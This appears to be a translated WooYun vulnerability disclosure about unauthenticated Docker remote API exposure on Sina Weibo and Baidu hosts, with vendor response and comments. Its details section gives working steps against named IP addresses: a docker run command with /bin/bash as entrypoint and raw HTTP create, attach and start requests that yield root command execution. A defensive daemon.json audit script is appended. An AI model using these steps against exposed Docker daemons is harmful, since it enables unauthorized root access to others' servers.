
Vulnerability summary

Defect ID: wooyun-2016-0209856

Title: Sina Weibo Docker remote API unauthenticated access leading to remote command execution (root)

Vendor: Sina Weibo

Author: lijiejie

Submitted: 2016-05-17 20:55

Fixed: 2016-05-17 21:07

Published: 2016-05-17 21:07

Vulnerability type: unauthorized network access

Severity: High

Self-assessed Rank: 15

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2016-05-17: Details sent to the vendor, awaiting vendor action
2016-05-17: Vendor actively ignored the vulnerability; details disclosed to the public

Summary:

Two Sina Weibo IPs expose the Docker remote API without authentication, leading to remote command execution with root privileges. Because the Docker version was too old, I temporarily used Burp to send a few HTTP requests that call the API, and achieved remote command execution. This write-up also describes how to obtain an interactive shell directly.

Details:

http://123.125.105.158:2375/version
http://123.125.105.159:2375/version


"ApiVersion":"1.17": because the version is so old, my docker client could not talk to it. I sent the requests with Burp to achieve remote command execution, which requires a small trick.

[screenshot: weibo.apiversion.png]

Proof of vulnerability:

Install the docker client:

https://www.docker.com/products/docker-toolbox


Taking that Baidu IP as an example, to get an interactive shell, first list the images:

docker -H tcp://180.76.161.55:2375 images


docker -H tcp://180.76.161.55:2375 run -it --entrypoint /bin/bash ubuntu "-h"


Here I set the entrypoint to /bin/bash. Shell obtained, as shown below:

[screenshot: baidu_shell.png]


OK, back to the Weibo machines. Because the API version is too old, the client cannot be used directly.
At first my commands kept failing; only when I inspected the container did I find that the default Entrypoint is /usr/local/sinasrv2/sbin/nginx. It can be overwritten when creating the container, though. Create a container:

POST /v1.17/containers/create HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 1082
Content-Type: application/json
Accept-Encoding: gzip

{"Hostname":"","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"ExposedPorts":{},"PublishService":"","Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":[],"Cmd":["-h"],"Image":"registry.intra.weibo.com/weibo_blogarticle/tfs-nginx:20150625","Volumes":{},"VolumeDriver":"","WorkingDir":"","Entrypoint":["/bin/bash","-c"],"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":{},"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Memory":0,"MemorySwap":0,"CpuShares":0,"CpuPeriod":0,"CpusetCpus":"","CpusetMems":"","CpuQuota":0,"BlkioWeight":0,"OomKillDisable":false,"MemorySwappiness":-1,"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"","IpcMode":"","PidMode":"","UTSMode":"","CapAdd":null,"CapDrop":null,"GroupAdd":null,"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"SecurityOpt":null,"ReadonlyRootfs":false,"Ulimits":null,"LogConfig":{"Type":"","Config":{}},"CgroupParent":"","ConsoleSize":[42,80]}}


Find the Id, as shown:

[screenshot: weibo_create_container.png]


Then you can fetch the container's info to check that nothing is wrong; this step can be skipped:

http://123.125.105.158:2375/v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/json


Next come two HTTP requests, and the order is crucial: attach first, then start, so that the output can be captured:

POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/attach?stderr=1&stdin=1&stdout=1&stream=1 HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip


POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/start HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip


As shown, executing commands inside Weibo's container shows that the current user is root, the hostname is bcd44e3731cc, and pwd is app.

[screenshot: weibo.rce.out.png]


Fix:

Do not expose port 2375 to the outside.

Copyright notice: please credit lijiejie@WooYun when reposting.
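As an added example (not part of the original report), here is a small Python audit of a Docker daemon.json that flags the weak setting behind this report, a plaintext TCP listener reachable without TLS client authentication, beside a hardened configuration. Both sample configs are constructed; the keys hosts, tlsverify, tlscacert, tlscert and tlskey are real Docker daemon options.

```python
import json

# The exposure in this report: the Docker API on tcp port 2375 answered
# /version and /containers/* to anyone, and container creation with an
# overridden Entrypoint is root-equivalent on the host. This audit reads
# a daemon.json document and reports every TCP listener that lacks
# mutual TLS, binds all interfaces, or uses the conventional plaintext port.

def audit_daemon_config(daemon_json: str) -> list:
    """Return a list of findings (empty list means no issue found)."""
    cfg = json.loads(daemon_json)
    findings = []
    tls_verify = bool(cfg.get("tlsverify", False))
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are local-only
        addr = host[len("tcp://"):]
        ip, _, port = addr.rpartition(":")
        if ip in ("", "0.0.0.0", "[::]"):
            findings.append(f"{host}: listens on all interfaces")
        if not tls_verify:
            findings.append(f"{host}: TCP listener without tlsverify "
                            "(unauthenticated, root-equivalent API)")
        if port == "2375":
            findings.append(f"{host}: port 2375 is the conventional plaintext port")
    if tls_verify:
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                findings.append(f"tlsverify is set but {key} is missing")
    return findings

# Constructed sample configs (not taken from the affected hosts).
WEAK_CONFIG = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_CONFIG = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_daemon_config(cfg) or ["ok"])
```

Mutual TLS only authenticates clients; the report's own fix, keeping the port off the public network, still applies on top of it.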


Responses

Vendor response:

Severity: no impact, vendor ignored

Ignored on: 2016-05-17 21:07

Vendor reply:

Already fixed before the vulnerability was submitted, hence ignored.

Latest status:

None yet


Vulnerability ratings:

Comments

  1. 2016-05-17 21:14 | 黑客,绝对是黑客 ( Passerby | Rank:18 Vulns:4 | 黑客,绝对是黑客)

    Looking back through it, this one was actually in my IP list, but my eyes glazed over and I missed it~

  2. 2016-05-17 21:19 | lijiejie Certified White Hat ( Core White Hat | Rank:2502 Vulns:323 | Just for fun.)

    @黑客,绝对是黑客 Nice, and thanks for sharing vulnerabilities on wooyun too!